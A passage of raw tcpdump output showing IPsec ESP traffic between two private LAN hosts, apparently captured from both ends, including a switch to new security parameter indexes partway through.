192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3e) (DF) (ttl 64, id 5485, len 1496) 20:04:11.912595 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11320) (DF) (ttl 64, id 34207, len 72) 20:04:11.912746 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11321) (DF) (ttl 64, id 34208, len 72) 20:04:11.912782 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3f) (DF) (ttl 64, id 5486, len 1496) 20:04:11.912933 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa40) (DF) (ttl 64, id 5487, len 1496) 20:04:11.913106 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa41) (DF) (ttl 64, id 5488, len 1496) 20:04:11.913257 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa42) (DF) (ttl 64, id 5489, len 1496) 20:04:11.913494 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11322) (DF) (ttl 64, id 34209, len 72) 20:04:11.913673 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa43) (DF) (ttl 64, id 5490, len 1496) 20:04:11.913820 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa44) (DF) (ttl 64, id 5491, len 1496) 20:04:11.913968 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa45) (DF) (ttl 64, id 5492, len 1496) 20:04:11.915429 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11323) (DF) (ttl 64, id 34210, len 72) 20:04:11.915535 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11324) (DF) (ttl 64, id 34211, len 72) 20:04:11.915623 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa46) (DF) (ttl 64, id 5493, len 1496) 20:04:11.915796 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa47) (DF) (ttl 64, id 5494, len 1496) 20:04:11.915948 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa48) (DF) (ttl 64, id 5495, len 1496) 20:04:11.916095 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa49) (DF) (ttl 64, id 5496, len 1496) 20:04:11.915719 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11325) (DF) (ttl 64, id 34212, len 72) 20:04:11.916301 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4a) (DF) (ttl 64, id 5497, len 1496) 20:04:11.916459 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4b) (DF) (ttl 64, id 5498, len 1496) 20:04:11.916616 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4c) (DF) (ttl 64, id 5499, len 1496) 20:04:11.916775 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4d) (DF) (ttl 64, id 5500, len 1496) 20:04:11.916933 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4e) (DF) (ttl 64, id 5501, len 1496) 20:04:11.917943 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11326) (DF) (ttl 64, id 34213, len 72) 20:04:11.918118 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4f) (DF) (ttl 64, id 5502, len 1496) 20:04:11.918274 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa50) (DF) (ttl 64, id 5503, len 1496) 20:04:11.918423 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa51) (DF) (ttl 64, id 5504, len 1496) 20:04:11.918573 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa52) (DF) (ttl 64, id 5505, len 1496) 20:04:11.918723 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa53) (DF) (ttl 64, id 5506, len 1496) 20:04:11.918215 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11327) (DF) (ttl 64, id 34214, len 72) 20:04:11.919551 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11328) (DF) (ttl 64, id 34215, len 72) 20:04:11.919723 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa54) (DF) (ttl 64, id 5507, len 1496) 20:04:11.919740 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11329) (DF) (ttl 64, id 34216, len 72) 20:04:11.919872 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa55) (DF) (ttl 64, id 5508, len 1496) 20:04:11.920026 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa56) (DF) (ttl 64, id 5509, len 1496) 20:04:11.920169 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa57) (DF) (ttl 64, id 5510, len 1496) 20:04:11.920322 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa58) (DF) (ttl 64, id 5511, len 1496) 20:04:11.920469 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa59) (DF) (ttl 64, id 5512, len 1496) 20:04:11.920479 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132a) (DF) (ttl 64, id 34217, len 72) 20:04:11.920691 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5a) (DF) (ttl 64, id 5513, len 1496) 20:04:11.920839 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5b) (DF) (ttl 64, id 5514, len 1496) 20:04:11.920983 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5c) (DF) (ttl 64, id 5515, len 1496) 20:04:11.922911 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132b) (DF) (ttl 64, id 34218, len 72) 20:04:11.923041 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132c) (DF) (ttl 64, id 34219, len 72) 20:04:11.923193 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132d) (DF) (ttl 64, id 34220, len 72) 20:04:11.923369 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132e) (DF) (ttl 64, id 34221, len 72) 20:04:11.924299 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132f) (DF) (ttl 64, id 34222, len 72) 20:04:12.123058 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1) (DF) (ttl 64, id 5516, len 1496) 20:04:12.123682 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x1) (DF) (ttl 64, id 34223, len 88) 20:04:12.123895 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x2) (DF) (ttl 64, id 5517, len 1496) 20:04:12.124044 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x3) (DF) (ttl 64, id 5518, len 1496) 20:04:12.124190 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x4) (DF) (ttl 64, id 5519, len 1496) 20:04:12.124375 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x2) (DF) (ttl 64, id 34224, len 72) 20:04:12.124607 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x5) (DF) (ttl 64, id 5520, len 1496) 20:04:12.124636 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x3) (DF) (ttl 64, id 34225, len 72) 20:04:12.124755 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x6) (DF) (ttl 64, id 5521, len 1496) 20:04:12.124897 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x4) (DF) (ttl 64, id 34226, len 72) 20:04:12.124929 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x7) (DF) (ttl 64, id 5522, len 1496) 20:04:12.125079 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x8) (DF) (ttl 64, id 5523, len 1496) 20:04:12.125190 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x5) (DF) (ttl 64, id 34227, len 72) 20:04:12.125250 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x9) (DF) (ttl 64, id 5524, len 1496) 20:04:12.125403 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xa) (DF) (ttl 64, id 5525, len 1496) 20:04:12.125478 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x6) (DF) (ttl 64, id 34228, len 72) 20:04:12.125584 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xb) (DF) (ttl 64, id 5526, len 1496) 20:04:12.125737 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xc) (DF) (ttl 64, id 5527, len 1496) 20:04:12.125913 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xd) (DF) (ttl 64, id 5528, len 1496) 20:04:12.126062 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xe) (DF) (ttl 64, id 5529, len 1496) 20:04:12.125744 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x7) (DF) (ttl 64, id 34229, len 72) 20:04:12.126032 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x8) (DF) (ttl 64, id 34230, len 72) 20:04:12.126274 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xf) (DF) (ttl 64, id 5530, len 1496) 20:04:12.126329 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x9) (DF) (ttl 64, id 34231, len 72) 20:04:12.126423 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x10) (DF) (ttl 64, id 5531, len 1496) 20:04:12.126584 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x11) (DF) (ttl 64, id 5532, len 1496) 20:04:12.126586 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xa) (DF) (ttl 64, id 34232, len 72) 20:04:12.126740 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x12) (DF) (ttl 64, id 5533, len 1496) 20:04:12.126869 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xb) (DF) (ttl 64, id 34233, len 72) 20:04:12.126909 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x13) (DF) (ttl 64, id 5534, len 1496) 20:04:12.127066 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x14) (DF) (ttl 64, id 5535, len 1496) 20:04:12.127227 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x15) (DF) (ttl 64, id 5536, len 1496) 20:04:12.127228 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xc) (DF) (ttl 64, id 34234, len 72) 20:04:12.127388 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x16) (DF) (ttl 64, id 5537, len 1496) 20:04:12.127539 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xd) (DF) (ttl 64, id 34235, len 72) 20:04:12.127548 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x17) (DF) (ttl 64, id 5538, len 1496) 20:04:12.127700 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x18) (DF) (ttl 64, id 5539, len 1496) 20:04:12.127848 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xe) (DF) (ttl 64, id 34236, len 72) 20:04:12.127862 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x19) (DF) (ttl 64, id 5540, len 1496) 20:04:12.128010 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1a) (DF) (ttl 64, id 5541, len 1496) 20:04:12.128155 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xf) (DF) (ttl 64, id 34237, len 72) 20:04:12.128175 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1b) (DF) (ttl 64, id 5542, len 1496) 20:04:12.128329 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1c) (DF) (ttl 64, id 5543, len 1496) 20:04:12.128495 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1d) (DF) (ttl 64, id 5544, len 1496) 20:04:12.128549 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x10) (DF) (ttl 64, id 34238, len 72) 20:04:12.128644 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1e) (DF) (ttl 64, id 5545, len 1496) 20:04:12.128806 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1f) (DF) (ttl 64, id 5546, len 1496) 20:04:12.128954 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x20) (DF) (ttl 64, id 5547, len 1496) 20:04:12.129108 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x21) (DF) (ttl 64, id 5548, len 1496) 20:04:12.133258 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x11) (DF) (ttl 64, id 34239, len 72) 20:04:12.133508 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x12) (DF) (ttl 64, id 34240, len 72) 20:04:29.971609 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x13) (DF) (ttl 64, id 34241, len 72) 20:04:30.179171 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x14) (DF) (ttl 64, id 34242, len 72) 20:04:30.595134 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x15) (DF) (ttl 64, id 34243, len 72) --- last 150 lines of tcpdump on 192.168.0.3 19:55:25.903800 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa15) (DF) (ttl 64, id 5444, len 1496) 19:55:25.903944 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa16) (DF) (ttl 64, id 5445, len 1496) 19:55:25.904102 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa17) (DF) (ttl 64, id 5446, len 1496) 19:55:25.905078 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11315) (DF) (ttl 64, id 34196, len 72) 19:55:25.905196 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11316) (DF) (ttl 64, id 34197, len 72) 19:55:25.905321 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11317) (DF) (ttl 64, id 34198, len 72) 19:55:25.905463 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa18) (DF) (ttl 64, id 5447, len 1496) 19:55:25.905646 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa19) (DF) (ttl 64, id 5448, len 1496) 19:55:25.905798 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1a) (DF) (ttl 64, id 5449, len 1496) 19:55:25.905948 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1b) (DF) (ttl 64, id 5450, len 1496) 19:55:25.906126 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1c) (DF) (ttl 64, id 5451, len 1496) 19:55:25.906276 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1d) (DF) (ttl 64, id 5452, len 1496) 19:55:25.906425 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1e) (DF) (ttl 64, id 5453, len 1496) 19:55:25.906575 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1f) (DF) (ttl 64, id 5454, len 1496) 19:55:25.907210 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11318) (DF) (ttl 64, id 34199, len 72) 19:55:25.907445 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11319) (DF) (ttl 64, id 34200, len 72) 19:55:25.907589 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa20) (DF) (ttl 64, id 5455, len 1496) 19:55:25.907739 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa21) (DF) (ttl 64, id 5456, len 1496) 19:55:25.907902 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa22) (DF) (ttl 64, id 5457, len 1496) 19:55:25.908050 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa23) (DF) (ttl 64, id 5458, len 1496) 19:55:25.908201 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa24) (DF) (ttl 64, id 5459, len 1496) 19:55:25.908350 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa25) (DF) (ttl 64, id 5460, len 1496) 19:55:25.908497 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa26) (DF) (ttl 64, id 5461, len 1496) 19:55:25.908646 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa27) (DF) (ttl 64, id 5462, len 1496) 19:55:25.908831 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa28) (DF) (ttl 64, id 5463, len 1496) 19:55:25.909557 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131a) (DF) (ttl 64, id 34201, len 72) 19:55:25.909806 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131b) (DF) (ttl 64, id 34202, len 72) 19:55:25.909942 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa29) (DF) (ttl 64, id 5464, len 1496) 19:55:25.910106 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2a) (DF) (ttl 64, id 5465, len 1496) 19:55:25.910249 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2b) (DF) (ttl 64, id 5466, len 1496) 19:55:25.910389 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2c) (DF) (ttl 64, id 5467, len 1496) 19:55:25.910529 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2d) (DF) (ttl 64, id 5468, len 1496) 19:55:25.910668 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2e) (DF) (ttl 64, id 5469, len 1496) 19:55:25.912017 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131c) (DF) (ttl 64, id 34203, len 72) 19:55:25.912132 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131d) (DF) (ttl 64, id 34204, len 72) 19:55:25.912259 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131e) (DF) (ttl 64, id 34205, len 72) 19:55:25.912415 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131f) (DF) (ttl 64, id 34206, len 72) 19:55:25.912474 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2f) (DF) (ttl 64, id 5470, len 1496) 19:55:25.912651 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa30) (DF) (ttl 64, id 5471, len 1496) 19:55:25.912806 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa31) (DF) (ttl 64, id 5472, len 1496) 19:55:25.912949 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa32) (DF) (ttl 64, id 5473, len 1496) 19:55:25.913124 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa33) (DF) (ttl 64, id 5474, len 1496) 19:55:25.913290 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa34) (DF) (ttl 64, id 5475, len 1496) 19:55:25.913442 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa35) (DF) (ttl 64, id 5476, len 1496) 19:55:25.913594 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa36) (DF) (ttl 64, id 5477, len 1496) 19:55:25.913807 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa37) (DF) (ttl 64, id 5478, len 1496) 19:55:25.913954 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa38) (DF) (ttl 64, id 5479, len 1496) 19:55:25.914117 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa39) (DF) (ttl 64, id 5480, len 1496) 19:55:25.914260 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3a) (DF) (ttl 64, id 5481, len 1496) 19:55:25.914406 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3b) (DF) (ttl 64, id 5482, len 1496) 19:55:25.914558 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3c) (DF) (ttl 64, id 5483, len 1496) 19:55:25.914711 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3d) (DF) (ttl 64, id 5484, len 1496) 19:55:25.914860 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3e) (DF) (ttl 64, id 5485, len 1496) 19:55:25.916653 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11320) (DF) (ttl 64, id 34207, len 72) 19:55:25.916807 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11321) (DF) (ttl 64, id 34208, len 72) 19:55:25.917046 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3f) (DF) (ttl 64, id 5486, len 1496) 19:55:25.917196 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa40) (DF) (ttl 64, id 5487, len 1496) 19:55:25.917561 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11322) (DF) (ttl 64, id 34209, len 72) 19:55:25.917371 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa41) (DF) (ttl 64, id 5488, len 1496) 19:55:25.917517 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa42) (DF) (ttl 64, id 5489, len 1496) 19:55:25.917936 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa43) (DF) (ttl 64, id 5490, len 1496) 19:55:25.918095 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa44) (DF) (ttl 64, id 5491, len 1496) 19:55:25.918230 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa45) (DF) (ttl 64, id 5492, len 1496) 19:55:25.919488 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11323) (DF) (ttl 64, id 34210, len 72) 19:55:25.919595 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11324) (DF) (ttl 64, id 34211, len 72) 19:55:25.919778 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11325) (DF) (ttl 64, id 34212, len 72) 19:55:25.919887 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa46) (DF) (ttl 64, id 5493, len 1496) 19:55:25.920059 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa47) (DF) (ttl 64, id 5494, len 1496) 19:55:25.920206 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa48) (DF) (ttl 64, id 5495, len 1496) 19:55:25.920353 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa49) (DF) (ttl 64, id 5496, len 1496) 19:55:25.920576 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4a) (DF) (ttl 64, id 5497, len 1496) 19:55:25.920725 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4b) (DF) (ttl 64, id 5498, len 1496) 19:55:25.920880 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4c) (DF) (ttl 64, id 5499, len 1496) 19:55:25.921037 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4d) (DF) (ttl 64, id 5500, len 1496) 19:55:25.921195 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4e) (DF) (ttl 64, id 5501, len 1496) 19:55:25.922003 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11326) (DF) (ttl 64, id 34213, len 72) 19:55:25.922276 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11327) (DF) (ttl 64, id 34214, len 72) 19:55:25.922380 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa4f) (DF) (ttl 64, id 5502, len 1496) 19:55:25.922536 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa50) (DF) (ttl 64, id 5503, len 1496) 19:55:25.922724 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa51) (DF) (ttl 64, id 5504, len 1496) 19:55:25.922837 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa52) (DF) (ttl 64, id 5505, len 1496) 19:55:25.922989 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa53) (DF) (ttl 64, id 5506, len 1496) 19:55:25.923612 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11328) (DF) (ttl 64, id 34215, len 72) 19:55:25.923798 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11329) (DF) (ttl 64, id 34216, len 72) 19:55:25.923989 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa54) (DF) (ttl 64, id 5507, len 1496) 19:55:25.924131 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa55) (DF) (ttl 64, id 5508, len 1496) 19:55:25.924539 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132a) (DF) (ttl 64, id 34217, len 72) 19:55:25.924287 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa56) (DF) (ttl 64, id 5509, len 1496) 19:55:25.924431 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa57) (DF) (ttl 64, id 5510, len 1496) 19:55:25.924574 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa58) (DF) (ttl 64, id 5511, len 1496) 19:55:25.924732 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa59) (DF) (ttl 64, id 5512, len 1496) 19:55:25.924953 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5a) (DF) (ttl 64, id 5513, len 1496) 19:55:25.925107 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5b) (DF) (ttl 64, id 5514, len 1496) 19:55:25.925243 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa5c) (DF) (ttl 64, id 5515, len 1496) 19:55:25.926969 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132b) (DF) (ttl 64, id 34218, len 72) 19:55:25.927101 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132c) (DF) (ttl 64, id 34219, len 72) 19:55:25.927255 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132d) (DF) (ttl 64, id 34220, len 72) 19:55:25.927431 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132e) (DF) (ttl 64, id 34221, len 72) 19:55:25.928358 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132f) (DF) (ttl 64, id 34222, len 72) 19:55:26.127301 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1) (DF) (ttl 64, id 5516, len 1496) 19:55:26.127706 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x1) (DF) (ttl 64, id 34223, len 88) 19:55:26.128128 192.168.0.1 > 